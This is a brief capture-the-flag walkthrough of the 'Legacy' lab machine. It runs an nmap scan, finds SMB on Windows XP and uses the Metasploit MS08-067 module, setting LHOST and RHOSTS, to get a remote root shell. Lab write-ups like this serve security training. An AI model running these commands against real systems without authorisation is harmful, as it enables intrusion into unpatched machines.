Legacy


Contents

Intro


This was my first Windows box, as well as the shortest/most straightforward box out of all the ones I've done so far haha. I'll showcase why.

User and Root


Starting with nmap:

sudo nmap -sC -sV 10.129.227.181

135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Looks like the machine is running SMB. Given how outdated windows XP is, I thought it would be pretty reasonable to just search for a vulnerability online. Safe to say it didn't take too long to find one.

This exploit can be found in the metasploit framework:

msfconsole
use exploit/windows/smb/ms08_067_netapi

The only parameters that required any change were the two LHOST and RHOSTS. Once we've changed those, the exploit can be run and we net ourselves a root shell.